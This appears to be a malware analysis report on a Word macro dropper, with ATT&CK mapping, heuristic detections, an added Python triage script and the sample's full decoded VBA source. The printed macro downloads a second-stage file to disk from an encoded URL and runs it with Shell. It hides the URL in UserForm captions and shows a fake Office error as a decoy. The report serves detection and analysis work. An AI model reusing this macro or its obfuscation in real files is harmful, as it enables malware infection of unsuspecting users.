MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is an OOXML (Word) document whose VBA project instructs the user to enable content, a common lure. The macro declares URLDownloadToFile from urlmon.dll and calls Shell(), so it fetches a second-stage payload to disk and executes it (T1105 followed by execution of the dropped file). Tracing the extracted code: the only call into the chain is from the InkEdit1_GotFocus event of an InkEdit ActiveX control in ThisDocument (there is no AutoOpen or Document_Open), so the macro fires when that control receives focus rather than on open; St() then reads the download URL and destination path from the captions of two controls (Nuetb1, Nuetb2) on the UserForm QYE154, decodes them with Dcr/Dcr2 (comma-separated decimal character codes turned back into a string with Chr), downloads via wer2()/URLDownloadToFile, runs the dropped path with Shell via Go1()/Go2(), and finally shows a fake "older version of Microsoft Office ... [Error Code: -219]" message box (MsgBox with vbCritical) as a decoy. The `If IsObject(obj1)` guard around the download is not a real check: IsObject returns True for a variable declared As Object even when it is Nothing, so the download always runs. Because the URL and path exist only as encoded captions inside word/vbaProject.bin, they do not appear as plaintext strings in the decoded macro; recover them from the UserForm strings (for example with olevba's form-string extraction) rather than from the macro text. ClamAV's detection as 'Doc.Dropper.Agent-7402850-0' is consistent with this dropper behaviour.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-7402850-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-7402850-0
- VBA project inside OOXML [medium, 2 related findings] OOXML_VBA: Document contains a VBA project (VBA macros present)
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
  Function Go2(v0, v1, v3) Shell v1 End Function
- URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
  #If VBA7 Then Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
- Macro/content-enable lure [medium] SE_ENABLE_LURE: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs below are standard Office Open XML / WordprocessingML namespace URIs, not download locations; the sample's actual download URL is decoded at runtime from UserForm control captions and is not present as a plaintext string.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3676 bytes |

SHA-256: c18acae55ed374e1cd088762fd5569f1424e6d13d1a4e3e07c6670b711f6733b
Preview (first 1,000 lines of the extracted script; at 3676 bytes this is the whole macro source):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub InkEdit1_Change()
Dim hR1 As String
hR1 = "Hello researcher =D v.9.5.34" & _
"Night / 1823" & _
"My voice, to which love lends a tenderness and yearning," & _
"Disturbs night's dreamy calm... Pale at my bedside burning," & _
"A taper wastes away... From out my heart there surge" & _
"Swift verses, streams of love, that hum and sing and merge" & _
"And, full of you, rush on, with passion overflowing." & _
"I seem to see your eyes that, in the darkness glowing," & _
"Meet mine... I see your smile... You speak to me alone:" & _
"My friend, my dearest friend... I love... I'm yours... your own."
End Sub
Private Sub InkEdit1_GotFocus()
St
End Sub
Attribute VB_Name = "QYE154"
Attribute VB_Base = "0{DE55A1CA-3A8D-49FF-A2A0-FDCDFDE9408B}{F4137A24-3413-4E86-A00B-6FF4D3CD3DD5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
Private Sub TextBox2_Change()
End Sub
Private Sub Label1_Click()
End Sub
Private Sub Mnyer1_Click()
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Function wer2(v0, v1, v2, v4)
URLDownloadToFile 0, v1, v2, 0, 0
End Function
Sub St()
Dim url1 As String
url1 = gtF1
Dim path1 As String
path1 = gtF2
Dim obj1 As Object
If IsObject(obj1) = True Then
Dw2 3445, url1, path1
End If
Dim pth As String
pth = path1
Go1 "yrfgr", pth
End Sub
Sub Dw2(v1, url1, path1)
wer2 2, url1, path1, 7
End Sub
Function Dcr2(a1)
Dim b1 As String
Dim s1 As String
lb1 = LBound(a1)
ub1 = UBound(a1)
For o1 = lb1 To ub1
b1 = Chr(a1(o1))
s1 = s1 + b1
Next o1
Dcr2 = s1
End Function
Function Go2(v0, v1, v3)
Shell v1
End Function
Function Bbox(v2, v1)
MsgBox v1, 16
End Function
Function gtF1()
gtF1 = Dcr(QYE154.Nuetb1.Caption)
End Function
Function gtF2()
gtF2 = Dcr(QYE154.Nuetb2.Caption)
End Function
Attribute VB_Name = "Module2"
Function Dcr(str)
arr = Split(str, ",", -1)
Dcr = Dcr2(arr)
End Function
Function Go1(v0 As String, v1 As String)
Go2 "werwe", v1, "234234"
Bbox "hepoik", gtMs
End Function
Function gtMs()
gtMs = "This ap" & "plic" & "ation ap" & "pears to ha" & "ve be" & "en made wi" & "th an old" & "er versi" & "on of the Mi" & "cro" & "soft Off" & "ice product su" & "ite. Please have the author save this doc" & "ument to a newer and sup" & "ported format. [Er" & "ror Co" & "de: -21" & "9]"
End Function
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 23040 bytes |

SHA-256: b3dd70a15e73ec7426c275ca7e74cec53ddcabddef7be7545e57bb1c39858796
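As an added example (my code, not the analyzer's report and not code from the sample): the script below reproduces in Python the Dcr/Dcr2 caption decoder from the extracted macro, the Shell and URLDownloadToFile heuristics from the findings list, and a pass that collapses the `"a" & "b"` string splitting used for the decoy message box, so the download URL and drop path can be recovered from the UserForm captions of a sample like this one. The VBA excerpt is taken from the macros.bas preview above; the form strings are constructed for the demo (the real captions live in the UserForm streams of word/vbaProject.bin and can be pulled with oletools, e.g. olevba's `VBA_Parser.extract_form_strings()`), and the URL and path they decode to are placeholders, not indicators from this sample.

```python
"""Triage helper for Dcr-style caption obfuscation (added example, not the report's code).

Mirrors the report's OLE_VBA_DOWNLOAD / OLE_VBA_SHELL heuristics, adds two of my own
(caption indirection, split-string decoy), and decodes the sample's Dcr()/Dcr2() scheme:
a comma-separated list of decimal character codes turned back into text with Chr().
"""
import re

# Dcr encoding: decimal char codes separated by commas (at least two codes).
_CODE_LIST = re.compile(r"^\s*\d{1,3}(?:\s*,\s*\d{1,3})+\s*$")

HEURISTICS = {
    "OLE_VBA_DOWNLOAD": re.compile(r"\bURLDownloadToFile\b", re.I),
    # Shell used as a bare statement at line start, as in `Shell v1` in the sample.
    "OLE_VBA_SHELL": re.compile(r"^\s*(?:Call\s+)?Shell\b", re.I),
    "VBA_CAPTION_READ": re.compile(r"\b\w+\.\w+\.Caption\b", re.I),  # Form.Control.Caption
    "VBA_SPLIT_STRING": re.compile(r'"\s*&\s*"'),                    # "ab" & "cd" runs
}


def dcr(caption):
    """Python equivalent of Dcr()/Dcr2(): Split(str, ",") then Chr() on each element."""
    return "".join(chr(int(tok)) for tok in caption.split(","))


def decode_form_strings(strings):
    """Return [(raw, decoded)] for strings in Dcr encoding that decode to printable ASCII.
    Control names and plain captions do not match the encoding and are skipped."""
    found = []
    for s in strings:
        if not _CODE_LIST.match(s):
            continue
        decoded = dcr(s)
        if all(32 <= ord(c) < 127 for c in decoded):
            found.append((s, decoded))
    return found


def join_split_strings(line):
    """Collapse "ab" & "cd" into "abcd" so split decoy/lure text reads as one string."""
    return HEURISTICS["VBA_SPLIT_STRING"].sub("", line)


def scan_vba(source):
    """Map heuristic name -> list of matching (stripped) source lines."""
    hits = {name: [] for name in HEURISTICS}
    for line in source.splitlines():
        for name, rx in HEURISTICS.items():
            if rx.search(line):
                hits[name].append(line.strip())
    return hits


def triage(source, form_strings):
    """Run the scan, decode captions and un-split decoy text into one report dict."""
    report = scan_vba(source)
    report["DECODED_CAPTIONS"] = decode_form_strings(form_strings)
    report["DECOY_TEXT"] = [join_split_strings(l) for l in report["VBA_SPLIT_STRING"]]
    return report


# Excerpt of the extracted macros.bas shown in the report (Module1/Module2).
SAMPLE_VBA = '''\
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Function wer2(v0, v1, v2, v4)
URLDownloadToFile 0, v1, v2, 0, 0
End Function
Function Go2(v0, v1, v3)
Shell v1
End Function
Function gtF1()
gtF1 = Dcr(QYE154.Nuetb1.Caption)
End Function
Function gtMs()
gtMs = "This ap" & "plic" & "ation ap" & "pears to ha" & "ve be" & "en made wi" & "th an old" & "er versi" & "on of the Mi" & "cro" & "soft Off" & "ice product su" & "ite. Please have the author save this doc" & "ument to a newer and sup" & "ported format. [Er" & "ror Co" & "de: -21" & "9]"
End Function
'''

# CONSTRUCTED stand-in for the UserForm strings: control names, a plain caption, and two
# Dcr-encoded captions (placeholder URL/path, not indicators from the real sample).
FORM_STRINGS = [
    "Nuetb1",
    "Nuetb2",
    "1823",
    "104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,97,46,101,120,101",
    "67,58,92,84,101,109,112,92,97,46,101,120,101",
]

if __name__ == "__main__":
    for name, items in triage(SAMPLE_VBA, FORM_STRINGS).items():
        print(name)
        for item in items:
            print("   ", item)
```

The Shell heuristic deliberately matches only at line start: this sample calls `Shell v1` as a bare statement, and anchoring avoids flagging every identifier containing "Shell". Feed `decode_form_strings` the strings olevba pulls from the form streams and the decoded pair is the URL and drop path that the macro text never shows.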